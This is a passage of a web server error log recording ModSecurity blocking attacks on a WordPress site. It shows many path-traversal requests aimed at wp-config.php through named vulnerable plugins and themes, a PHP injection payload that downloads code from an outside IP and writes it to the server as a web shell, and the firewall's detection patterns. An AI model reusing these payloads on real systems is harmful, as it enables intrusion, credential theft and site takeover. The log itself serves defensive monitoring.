"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZN-xYlxvK4MFoveIP9_LRAAAAJA"] [Fri Aug 18 12:58:59.092007 2023] [:error] [pid 18873:tid 140103343126272] [client 87.249.132.213:36376] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZN-xY7CcrCl0jrDdhfxXiwAAAEo"] [Fri Aug 18 12:58:59.186960 2023] [:error] [pid 18873:tid 140103499544320] [client 87.249.132.213:36378] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-downloader/ebook_plugin.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-downloader/ebook_plugin.php"] [unique_id "ZN-xY7CcrCl0jrDdhfxXjAAAAEA"] [Fri Aug 18 12:58:59.281648 2023] [:error] [pid 18873:tid 140103275984640] [client 87.249.132.213:36380] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-shortcode/inc/force-download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-shortcode/inc/force-download.php"] [unique_id "ZN-xY7CcrCl0jrDdhfxXjQAAAFI"] [Fri Aug 18 12:58:59.400214 2023] [:error] [pid 18873:tid 140103292770048] [client 87.249.132.213:36382] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "ZN-xY7CcrCl0jrDdhfxXjgAAAFA"] [Fri Aug 18 12:59:01.536923 2023] [:error] [pid 18872:tid 140103326340864] [client 87.249.132.213:36388] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kap/download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kap/download.php"] [unique_id "ZN-xZfG_rKmCSnA6LxD5tgAAAAw"] [Fri Aug 18 12:59:01.664175 2023] [:error] [pid 19445:tid 140103317948160] [client 87.249.132.213:36390] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/oxygen-theme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZN-xZUWc94tsnIsHAQ-YewAAAM0"] [Fri Aug 18 12:59:01.783490 2023] [:error] [pid 19445:tid 140103275984640] [client 87.249.132.213:36392] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/rowe/download/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/rowe/download/download.php"] [unique_id "ZN-xZUWc94tsnIsHAQ-YfAAAANI"] [Fri Aug 18 12:59:03.922889 2023] [:error] [pid 19445:tid 140103368304384] [client 87.249.132.213:36400] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "ZN-xZ0Wc94tsnIsHAQ-YfgAAAMc"] [Fri Aug 18 12:59:11.053460 2023] [:error] [pid 18872:tid 140103457580800] [client 87.249.132.213:36424] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:img. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: http/1.0 found within ARGS:img: ../wp-config.php?http/1.0?action=revslider_show_image"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZN-xb_G_rKmCSnA6LxD5uQAAAAU"] [Fri Aug 18 12:59:16.101724 2023] [:error] [pid 19445:tid 140103275984640] [client 87.249.132.213:36446] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZN-xdEWc94tsnIsHAQ-YiQAAANI"] [Fri Aug 18 12:59:17.040820 2023] [:error] [pid 19445:tid 140103457580800] [client 87.249.132.213:36450] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZN-xdUWc94tsnIsHAQ-YigAAAMU"] [Fri Aug 18 12:59:17.165503 2023] [:error] [pid 19445:tid 140103465973504] [client 87.249.132.213:36452] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php"] [unique_id "ZN-xdUWc94tsnIsHAQ-YiwAAAMQ"] [Fri Aug 18 12:59:17.268610 2023] [:error] [pid 18872:tid 140103242413824] [client 87.249.132.213:36454] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tess/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tess/download.php"] [unique_id "ZN-xdfG_rKmCSnA6LxD5uwAAABY"] [Fri Aug 18 12:59:17.373147 2023] [:error] [pid 18872:tid 140103491151616] [client 87.249.132.213:36456] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jarida/download.php?uri=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jarida/download.php"] [unique_id "ZN-xdfG_rKmCSnA6LxD5vAAAAAE"] [Fri Aug 18 12:59:17.467560 2023] [:error] [pid 18873:tid 140103309555456] [client 87.249.132.213:36458] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/corporate_works/downloader.php?file_download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/corporate_works/downloader.php"] [unique_id "ZN-xdbCcrCl0jrDdhfxXkwAAAE4"] [Fri Aug 18 12:59:17.562211 2023] [:error] [pid 18874:tid 140103376697088] [client 87.249.132.213:36460] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Newspapertimes_1/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Newspapertimes_1/download.php"] [unique_id "ZN-xdVxvK4MFoveIP9_LSgAAAIY"] [Fri Aug 18 12:59:17.657531 2023] [:error] [pid 18874:tid 140103351518976] [client 87.249.132.213:36462] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "ZN-xdVxvK4MFoveIP9_LSwAAAIk"] [Fri Aug 18 14:42:56.703729 2023] [autoindex:error] [pid 19445:tid 140103482758912] [client 196.44.176.55:43692] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/jquery/index.php [Fri Aug 18 14:42:56.754343 2023] [autoindex:error] [pid 19445:tid 140103284377344] [client 196.44.176.55:43694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/jquery/index.php [Fri Aug 18 15:14:02.223008 2023] [:error] [pid 18874:tid 140103317948160] [client 103.200.37.153:46372] [client 103.200.37.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZN_RClxvK4MFoveIP9_PmAAAAI0"], referer: www.google.com [Fri Aug 18 15:40:49.745491 2023] [:error] [pid 19445:tid 140103284377344] [client 34.68.141.124:48222] [client 34.68.141.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZN_XUUWc94tsnIsHAQ-g8QAAANE"], referer: www.google.com [Fri Aug 18 16:24:25.775155 2023] [autoindex:error] [pid 18873:tid 140103368304384] [client 52.176.98.107:51786] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 18 18:10:45.930912 2023] [autoindex:error] [pid 19445:tid 140103482758912] [client 38.242.141.63:58974] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/blue/index.php [Fri Aug 18 18:46:27.526140 2023] [autoindex:error] [pid 18873:tid 140103267591936] [client 40.83.60.92:33092] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 18 19:51:27.844666 2023] [:error] [pid 19445:tid 140103482758912] [client 186.250.187.202:37522] [client 186.250.187.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: 0x1999 found within ARGS:pwd: 0x1999"] [severity "CRITICAL"] [ver 